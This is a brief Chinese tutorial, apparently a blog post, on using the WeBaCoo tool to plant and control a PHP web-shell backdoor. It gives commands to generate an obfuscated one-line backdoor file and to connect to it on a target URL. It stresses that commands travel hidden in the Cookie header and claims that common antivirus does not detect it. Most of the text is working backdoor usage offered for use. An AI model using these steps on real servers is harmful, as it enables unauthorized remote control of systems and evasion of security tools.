一. 简介:
获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。
参数: 查看帮助:webacoo -h
二. 使用记录:
webacoo -g -o webacoo.php (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。)
至于如何上传到服务器本地不在此赘述了。
webacoo -t -u http://192.168.56.101/webacoo.php (连接一句话木马,-t参数指定进行客户端的连接,-u参数指定目标URL。)
##抓包分析如何通过cookie头传指令,手动触发流量 【cm/cn/cp】
网友评论